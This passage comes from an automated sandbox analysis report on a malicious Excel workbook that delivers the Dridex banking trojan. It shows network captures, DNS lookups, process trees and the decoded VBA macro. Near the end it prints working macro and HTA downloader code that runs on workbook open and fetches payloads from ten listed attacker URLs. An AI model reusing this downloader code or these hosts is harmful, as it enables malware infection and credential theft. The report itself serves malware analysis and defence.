Jul 14, 2021 20:00:07.170800924 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170818090 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170850039 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.170871019 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.170905113 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170922995 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.170984030 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171011925 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171083927 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171101093 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171128988 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171358109 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171375990 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171418905 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171428919 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171504021 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171545029 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171586990 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171628952 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171633005 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171658039 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.171700001 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.171701908 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.172080994 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.173465967 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173547983 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173564911 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173583031 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173593044 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.173599005 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173629045 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173630953 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.173681974 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.173949003 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173965931 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.173985958 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174004078 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174012899 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174020052 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174036980 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174053907 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174056053 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174069881 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174081087 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174091101 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174108028 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174120903 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174128056 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174149036 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174154997 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174165010 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174185991 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174197912 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174202919 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174230099 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174247026 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174266100 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174282074 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174298048 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174314022 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.174319983 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174339056 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.174854040 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.175427914 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.286535025 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.286570072 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.286654949 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.286688089 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.286756992 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.286781073 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.291013956 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291152000 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291173935 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291208029 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291227102 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291229963 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.291253090 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.291254044 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291269064 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291287899 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291306019 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.291373968 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.291726112 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291786909 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291831017 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.291836023 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291853905 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.291891098 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.292289019 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.292304993 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.292372942 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.292378902 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.292397022 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.292434931 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.292438984 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.292651892 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.292700052 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.292716980 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.293150902 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.293210030 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.294733047 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.294750929 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.294770002 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.294800043 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.294816017 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.294826984 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.294831991 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.294845104 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.294869900 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.295222998 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.295248985 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.295264006 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.295299053 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.295340061 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.295386076 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.295422077 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.295437098 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.295480967 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:00:07.295488119 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:00:07.507895947 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:01:22.175352097 CEST	8088	49165	208.83.69.35	192.168.2.22
Jul 14, 2021 20:01:22.175457001 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:01:22.175635099 CEST	49165	8088	192.168.2.22	208.83.69.35
Jul 14, 2021 20:01:22.295984030 CEST	8088	49165	208.83.69.35	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 14, 2021 20:00:06.259974957 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 14, 2021 20:00:06.286272049 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 14, 2021 20:00:06.303292990 CEST	53099	53	192.168.2.22	8.8.8.8
Jul 14, 2021 20:00:06.327779055 CEST	53	53099	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 14, 2021 20:00:06.259974957 CEST	192.168.2.22	8.8.8.8	0x70c0	Standard query (0)	onlinefastsolutions.com	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.303292990 CEST	192.168.2.22	8.8.8.8	0x3714	Standard query (0)	onlinefastsolutions.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	208.83.69.35	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	128.199.243.169	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	163.172.213.69	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.286272049 CEST	8.8.8.8	192.168.2.22	0x70c0	No error (0)	onlinefastsolutions.com	185.21.216.153	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	185.21.216.153	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	163.172.213.69	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	128.199.243.169	A (IP address)	IN (0x0001)
Jul 14, 2021 20:00:06.327779055 CEST	8.8.8.8	192.168.2.22	0x3714	No error (0)	onlinefastsolutions.com	208.83.69.35	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

onlinefastsolutions.com:8088

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	208.83.69.35	8088	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jul 14, 2021 20:00:06.454802990 CEST	0	OUT	GET /tpls/file3.bin HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-us User-Agent: qWK3FM3 Host: onlinefastsolutions.com:8088
Jul 14, 2021 20:00:06.811981916 CEST	2	IN	HTTP/1.1 200 OK Server: nginx/1.15.12 Date: Wed, 14 Jul 2021 18:00:06 GMT Content-Type: application/octet-stream Content-Length: 167936 Connection: keep-alive Last-Modified: Wed, 14 Jul 2021 13:48:51 GMT ETag: "60eeeb43-29000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ff 81 78 c1 bb e0 16 92 bb e0 16 92 bb e0 16 92 bb e0 17 92 89 e0 16 92 b2 98 85 92 98 e0 16 92 bb e0 16 92 ba e0 16 92 b6 b2 ca 92 ba e0 16 92 b6 b2 cd 92 ba e0 16 92 b6 b2 c8 92 ba e0 16 92 52 69 63 68 bb e0 16 92 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c4 0c f0 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 40 01 00 00 50 01 00 00 00 00 00 f0 3e 01 00 00 10 00 00 00 50 01 00 00 00 00 10 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 02 00 00 10 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 52 01 00 5d 00 00 00 ec 52 01 00 68 01 00 00 00 80 02 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 01 00 00 00 10 51 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f7 38 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 0c 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 19 01 00 00 60 01 00 00 10 01 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ad 04 00 00 00 80 02 00 00 10 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 01 00 00 00 90 02 00 00 10 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xRichPEL`@P>P@R]Rh Q8P.text8@ `.rdataPP@@.dataX``@.rsrcp@@.reloc @B

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2820 Parent PID: 584

General

Start time:	19:59:44
Start date:	14/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f460000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 2104 Parent PID: 2820

General

Start time:	19:59:47
Start date:	14/07/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'
Imagebase:	0x13f060000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: qDialogMainChartType.exe PID: 3028 Parent PID: 2104

General

Start time:	19:59:49
Start date:	14/07/2021
Path:	C:\ProgramData\qDialogMainChartType.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\qDialogMainChartType.exe
Imagebase:	0x10000000
File size:	167936 bytes
MD5 hash:	EA91555829C1DFDFD47709496461C5D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine WorkBook_Open, APIs: 10, Strings: 6, Number of lines: 16, Relevance: 44.016

APIs	Meta Information
Range
Value
Chr
Value
CreateObject	CreateObject("Scripting.FileSystemObject")
Environ	Environ("ALLUSERSPROFILE") -> C:\ProgramData
Write	TextStream.Write("<!DOCTYPE html> <html> <head> <HTA:APPLICATION ID="CS" APPLICATIONNAME="Test" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"> <script type="text/vbscript" LANGUAGE="VBScript" > On Error Resume Next For Each qDialogWorkbookCopy in Array("http://onlinefastsolutions.com:8088/tpls/file3.bin","http://onlinefastsolutions.com:8088/images/details.bin","http://fasteasyupdates.com:8088/vendors/file4.bin","http://onlinefastsolutions.com:8088/js/file1.bin","http://buyer-remindment.com:8088/fonts/file8.bin","http://buyer-remindment.com:8088/css/file7.bin","http://onlinefastsolutions.com:8088/images/file13.bin","http://insiderushings.com:8088/js/file13.bin","http://buyer-remindment.com:8088/tpls/file4.bin","http://paymentadvisry.com:8088/wp-theme/file7.bin") Set qDialogWorkspace = createobject("MSXML2.ServerXMLHTTP.6.0") 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. Set qSortValues = createobject("Adodb.Stream") 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. qDialogWorkspace.Open "GET", qDialogWorkbookCopy, False 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. qDialogWorkspace.setRequestHeader "User-Agent", "qWK3FM3" qDialogWorkspace.Send 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. If qDialogWorkspace.Status = 200 And Len(qDialogWorkspace.ResponseBody)>1000 Then 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own )
Close
Chr
Environ	Environ("ALLUSERSPROFILE") -> C:\ProgramData

Strings	Decrypted Strings
"A65:O2886"
"Sheet1"
"Scripting.FileSystemObject"
"ALLUSERSPROFILE"
"ALLUSERSPROFILE"
"mshta ""

Line	Instruction	Meta Information
9	Sub WorkBook_Open()
10	For Each qHundredMillions in ActiveWorkbook.Sheets("Sheet1").Range("A65:O2886")	Range executed
11	If qHundredMillions.Value > 0 Then	Value
12	qUnlockedCells = qUnlockedCells & Chr(qHundredMillions.Value)	Chr Value
13	Endif
14	Next qHundredMillions	Range
15	Set qPCX = CreateObject("Scripting.FileSystemObject")	CreateObject("Scripting.FileSystemObject") executed
16	With qPCX
17	Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")	Environ("ALLUSERSPROFILE") -> C:\ProgramData executed
18	qLine.Write (qUnlockedCells)	TextStream.Write("<!DOCTYPE html> <html> <head> <HTA:APPLICATION ID="CS" APPLICATIONNAME="Test" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"> <script type="text/vbscript" LANGUAGE="VBScript" > On Error Resume Next For Each qDialogWorkbookCopy in Array("http://onlinefastsolutions.com:8088/tpls/file3.bin","http://onlinefastsolutions.com:8088/images/details.bin","http://fasteasyupdates.com:8088/vendors/file4.bin","http://onlinefastsolutions.com:8088/js/file1.bin","http://buyer-remindment.com:8088/fonts/file8.bin","http://buyer-remindment.com:8088/css/file7.bin","http://onlinefastsolutions.com:8088/images/file13.bin","http://insiderushings.com:8088/js/file13.bin","http://buyer-remindment.com:8088/tpls/file4.bin","http://paymentadvisry.com:8088/wp-theme/file7.bin") Set qDialogWorkspace = createobject("MSXML2.ServerXMLHTTP.6.0") 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. Set qSortValues = createobject("Adodb.Stream") 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. qDialogWorkspace.Open "GET", qDialogWorkbookCopy, False 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. qDialogWorkspace.setRequestHeader "User-Agent", "qWK3FM3" qDialogWorkspace.Send 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own life and the return of his company. Nay, but even so he saved not his company, though he desired it sore. For through the blindness of their own hearts they perished, fools, who devoured the oxen of Helios Hyperion: but the god took from them their day of returning. Of these things, goddess, daughter of Zeus, whencesoever thou hast heard thereof, declare thou even unto us. If qDialogWorkspace.Status = 200 And Len(qDialogWorkspace.ResponseBody)>1000 Then 'Tell me, Muse, of that man, so ready at need, who wandered far and wide, after he had sacked the sacred citadel of Troy, and many were the men whose towns he saw and whose mind he learnt, yea, and many the woes he suffered in his heart on the deep, striving to win his own ) executed
19	qLine.Close	Close
20	End With
21	With CreateObject("Wscript.Shell")
22	. Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))	Chr Environ("ALLUSERSPROFILE") -> C:\ProgramData executed
23	End With
24	End Sub

Reset < >

Analysis Process: qDialogMainChartType.exe PID: 3028 Parent PID: 2104 qDialogMainChartType.exeCOMMON

Executed Functions

Function 10010754, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 650
